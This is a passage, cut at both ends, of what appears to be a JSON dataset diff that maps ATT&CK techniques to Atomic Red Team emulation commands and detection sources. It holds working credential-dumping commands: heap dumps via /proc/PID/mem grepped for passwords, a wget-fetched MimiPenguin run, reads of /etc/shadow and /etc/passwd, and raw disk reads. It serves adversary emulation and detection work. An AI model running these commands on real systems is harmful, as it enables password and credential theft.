netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + null + ] + }, + { + "technique_id": "T1003.007", + "command_list": [ + "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"/tmp/T1003.007.bin\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"/tmp/T1003.007.bin\"\n", + "sh /tmp/T1003.007.sh\nPID=$(pgrep -n -f \"#{pid_term}\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"#{output_file}\"\n", + "sh #{script_path}\nPID=$(pgrep -n -f \"T1003.007\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"#{output_file}\"\n", + "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON #{python_script} $PID /tmp/T1003.007.bin\ngrep -i \"PASS\" \"/tmp/T1003.007.bin\"\n", + "sh /tmp/T1003.007.sh\nPID=$(pgrep -n -f \"#{pid_term}\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON #{python_script} $PID #{output_file}\ngrep -i \"PASS\" \"#{output_file}\"\n", + "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON PathToAtomicsFolder/T1003.007/src/dump_heap.py $PID #{output_file}\ngrep -i \"PASS\" \"#{output_file}\"\n", + "sh #{script_path}\nPID=$(pgrep -n -f \"T1003.007\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON #{python_script} $PID #{output_file}\ngrep -i \"PASS\" \"#{output_file}\"\n", + "sudo #{MimiPenguin_Location} > /tmp/T1003.007Test3.txt\ncat /tmp/T1003.007Test3.txt\n", + "sudo /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh > #{output_file}\ncat #{output_file}\n" + ], + "commands": [ + { + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"/tmp/T1003.007.bin\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"/tmp/T1003.007.bin\"\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sh /tmp/T1003.007.sh\nPID=$(pgrep -n -f \"#{pid_term}\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"#{output_file}\"\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"T1003.007\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"#{output_file}\"\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON #{python_script} $PID /tmp/T1003.007.bin\ngrep -i \"PASS\" \"/tmp/T1003.007.bin\"\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sh /tmp/T1003.007.sh\nPID=$(pgrep -n -f \"#{pid_term}\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON #{python_script} $PID #{output_file}\ngrep -i \"PASS\" \"#{output_file}\"\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON PathToAtomicsFolder/T1003.007/src/dump_heap.py $PID #{output_file}\ngrep -i \"PASS\" \"#{output_file}\"\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"T1003.007\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON #{python_script} $PID #{output_file}\ngrep -i \"PASS\" \"#{output_file}\"\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sudo #{MimiPenguin_Location} > /tmp/T1003.007Test3.txt\ncat /tmp/T1003.007Test3.txt\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sudo /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh > #{output_file}\ncat #{output_file}\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1003.007", + "display_name": "OS Credential Dumping: Proc Filesystem", + "atomic_tests": [ + { + "name": "Dump individual process memory with sh (Local)", + "auto_generated_guid": "7e91138a-8e74-456d-a007-973d67a0bb80", + "description": "Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to\ncopy process memory to an external file so it can be searched or exfiltrated later.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1003.007.bin" + }, + "script_path": { + "description": "Path to script generating the target process", + "type": "Path", + "default": "/tmp/T1003.007.sh" + }, + "pid_term": { + "description": "Unique string to use to identify target process", + "type": "String", + "default": "T1003.007" + } + }, + "dependencies": [ + { + "description": "Script to launch target process must exist\n", + "prereq_command": "test -f #{script_path}\ngrep \"#{pid_term}\" #{script_path}\n", + "get_prereq_command": "echo '#!/bin/sh' > #{script_path}\necho \"sh -c 'echo \\\"The password is #{pid_term}\\\" && sleep 30' &\" >> #{script_path}\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"#{output_file}\"\n", + "cleanup_command": "rm -f \"#{output_file}\"\n" + } + }, + { + "name": "Dump individual process memory with Python (Local)", + "auto_generated_guid": "437b2003-a20d-4ed8-834c-4964f24eec63", + "description": "Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to\ncopy a process's heap memory to an external file so it can be searched or exfiltrated later.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1003.007.bin" + }, + "script_path": { + "description": "Path to script generating the target process", + "type": "Path", + "default": "/tmp/T1003.007.sh" + }, + "python_script": { + "description": "Path to script generating the target process", + "type": "Path", + "default": "PathToAtomicsFolder/T1003.007/src/dump_heap.py" + }, + "pid_term": { + "description": "Unique string to use to identify target process", + "type": "String", + "default": "T1003.007" + } + }, + "dependencies": [ + { + "description": "Script to launch target process must exist\n", + "prereq_command": "test -f #{script_path}\ngrep \"#{pid_term}\" #{script_path}\n", + "get_prereq_command": "echo '#!/bin/sh' > #{script_path}\necho \"sh -c 'echo \\\"The password is #{pid_term}\\\" && sleep 30' &\" >> #{script_path}\n" + }, + { + "description": "Requires Python\n", + "prereq_command": "(which python || which python3 || which python2)\n", + "get_prereq_command": "echo \"Python 2.7+ or 3.4+ must be installed\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON #{python_script} $PID #{output_file}\ngrep -i \"PASS\" \"#{output_file}\"\n", + "cleanup_command": "rm -f \"#{output_file}\"\n" + } + }, + { + "name": "Capture Passwords with MimiPenguin", + "auto_generated_guid": "a27418de-bdce-4ebd-b655-38f04842bf0c", + "description": "MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). \nUpon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. \nSee https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. \nSee https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1003.007Test3.txt" + }, + "MimiPenguin_Location": { + "description": "Path of MimiPenguin script", + "type": "Path", + "default": "/tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})\n", + "prereq_command": "if [ -f \"#{MimiPenguin_Location}\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "wget -O \"/tmp/mimipenguin.tar.gz\" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz\nmkdir /tmp/mimipenguin\ntar -xzvf \"/tmp/mimipenguin.tar.gz\" -C /tmp/mimipenguin\n" + }, + { + "description": "Strings must be installed\n", + "prereq_command": "if [ -x \"$(command -v strings --version)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "sudo apt-get -y install binutils\n" + }, + { + "description": "Python2 must be installed\n", + "prereq_command": "if [ -x \"$(command -v python2 --version)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "sudo apt-get -y install python2 \n" + }, + { + "description": "Libc-bin must be installed\n", + "prereq_command": "if [ -x \"$(command -v ldd --version)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "sudo apt-get -y install libc-bin \n" + } + ], + "executor": { + "command": "sudo #{MimiPenguin_Location} > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file} > /dev/null\n", + "name": "bash", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1003.008", + "command_list": [ + "sudo cat /etc/shadow > /tmp/T1003.008.txt\ncat /tmp/T1003.008.txt\n", + "cat /etc/passwd > /tmp/T1003.008.txt\ncat /tmp/T1003.008.txt\n", + "echo -e \"e /etc/passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > /tmp/T1003.008.txt\n", + "function testcat(){ echo \"$(< $1)\"; }\ntestcat /etc/passwd > /tmp/T1003.008.txt\ntestcat /etc/shadow > /tmp/T1003.008.txt\n" + ], + "commands": [ + { + "command": "sudo cat /etc/shadow > /tmp/T1003.008.txt\ncat /tmp/T1003.008.txt\n", + "source": "atomics/T1003.008/T1003.008.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: /etc/passwd and /etc/shadow" + }, + { + "command": "cat /etc/passwd > /tmp/T1003.008.txt\ncat /tmp/T1003.008.txt\n", + "source": "atomics/T1003.008/T1003.008.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: /etc/passwd and /etc/shadow" + }, + { + "command": "echo -e \"e /etc/passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > /tmp/T1003.008.txt\n", + "source": "atomics/T1003.008/T1003.008.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: /etc/passwd and /etc/shadow" + }, + { + "command": "function testcat(){ echo \"$(< $1)\"; }\ntestcat /etc/passwd > /tmp/T1003.008.txt\ntestcat /etc/shadow > /tmp/T1003.008.txt\n", + "source": "atomics/T1003.008/T1003.008.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: /etc/passwd and /etc/shadow" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1003.008", + "display_name": "OS Credential Dumping: /etc/passwd and /etc/shadow", + "atomic_tests": [ + { + "name": "Access /etc/shadow (Local)", + "auto_generated_guid": "3723ab77-c546-403c-8fb4-bb577033b235", + "description": "/etc/shadow file is accessed in Linux environments\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1003.008.txt" + } + }, + "executor": { + "command": "sudo cat /etc/shadow > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Access /etc/passwd (Local)", + "auto_generated_guid": "60e860b6-8ae6-49db-ad07-5e73edd88f5d", + "description": "/etc/passwd file is accessed in Linux environments\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1003.008.txt" + } + }, + "executor": { + "command": "cat /etc/passwd > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "sh" + } + }, + { + "name": "Access /etc/{shadow,passwd} with a standard bin that's not cat", + "auto_generated_guid": "df1a55ae-019d-4120-bc35-94f4bc5c4b0a", + "description": "Dump /etc/passwd and /etc/shadow using ed\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1003.008.txt" + } + }, + "executor": { + "command": "echo -e \"e /etc/passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Access /etc/{shadow,passwd} with shell builtins", + "auto_generated_guid": "f5aa6543-6cb2-4fae-b9c2-b96e14721713", + "description": "Dump /etc/passwd and /etc/shadow using bash builtins\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1003.008.txt" + } + }, + "executor": { + "command": "function testcat(){ echo \"$(< $1)\"; }\ntestcat /etc/passwd > #{output_file}\ntestcat /etc/shadow > #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "bash", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1006", + "command_list": [ + "$buffer = New-Object byte[] 11\n$handle = New-Object IO.FileStream \"\\\\.\\C:\", 'Open', 'Read', 'ReadWrite'\n$handle.Read($buffer, 0, $buffer.Length)\n$handle.Close()\nFormat-Hex -InputObject $buffer\n" + ], + "commands": [ + { + "command": "$buffer = New-Object byte[] 11\n$handle = New-Object IO.FileStream \"\\\\.\\C:\", 'Open', 'Read', 'ReadWrite'\n$handle.Read($buffer, 0, $buffer.Length)\n$handle.Close()\nFormat-Hex -InputObject $buffer\n", + "source": "atomics/T1006/T1006.yaml", + "name": "Atomic Red Team Test - Direct Volume Access" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1006", + "display_name": "Direct Volume Access", + "atomic_tests": [ + { + "name": "Read volume boot sector via DOS device path (PowerShell)", + "auto_generated_guid": "88f6327e-51ec-4bbf-b2e8-3fea534eab8b", + "description": "This test uses PowerShell to open a handle on the drive volume via the `\\\\.\\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.\nOn success, a hex dump of the first 11 bytes of the volume is displayed.\n\nFor a NTFS volume, it should correspond to the following sequence ([NTFS partition boot sector](https://en.wikipedia.org/wiki/NTFS#Partition_Boot_Sector_(VBR))):\n```\n 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F\n\n00000000 EB 52 90 4E 54 46 53 20 20 20 20 \u00ebR?NTFS\n```", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "volume": { + "description": "Drive letter of the volume to access", + "type": "String", + "default": "C:" + } + }, + "executor": { + "command": "$buffer = New-Object byte[] 11\n$handle = New-Object IO.FileStream \"\\\\.\\#{volume}\", 'Open', 'Read', 'ReadWrite'\n$handle.Read($buffer, 0, $buffer.Length)\n$handle.Close()\nFormat-Hex -InputObject $buffer\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "200-500", + " 4100-4104", + "PowerShell logs" + ], + [ + "4663", + "File monitoring" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "200-500", + " 4100-4104", + "PowerShell logs" + ], + [ + "4663", + "File monitoring" + ], + [ + "API monitoring" + ], + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive access", + "description": "A drive partition was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "drive" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1007", + "command_list": [ + "tasklist.exe\nsc query\nsc query state= all\n", + "net.exe start >> C:\\Windows\\Temp\\service-list.txt\n", + "systemctl --type=service\n", + "Get-Service" + ], + "commands": [ + { + "command": "tasklist.exe\nsc query\nsc query state= all\n", + "source": "atomics/T1007/T1007.yaml", + "name": "Atomic Red Team Test - System Service Discovery" + }, + { + "command": "net.exe start >> C:\\Windows\\Temp\\service-list.txt\n", + "source": "atomics/T1007/T1007.yaml", + "name": "Atomic Red Team Test - System Service Discovery" + }, + { + "command": "systemctl --type=service\n", + "source": "atomics/T1007/T1007.yaml", + "name": "Atomic Red Team Test - System Service Discovery" + }, + { + "command": "Get-Service", + "source": "data/abilities/discovery/c6607391-d02c-44b5-9b13-d3492ca58599.yml", + "name": "Identify system services" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1007", + "display_name": "System Service Discovery", + "atomic_tests": [ + { + "name": "System Service Discovery", + "auto_generated_guid": "89676ba1-b1f8-47ee-b940-2e1a113ebc71", + "description": "Identify system services.\n\nUpon successful execution, cmd.exe will execute service commands with expected result to stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "tasklist.exe\nsc query\nsc query state= all\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "System Service Discovery - net.exe", + "auto_generated_guid": 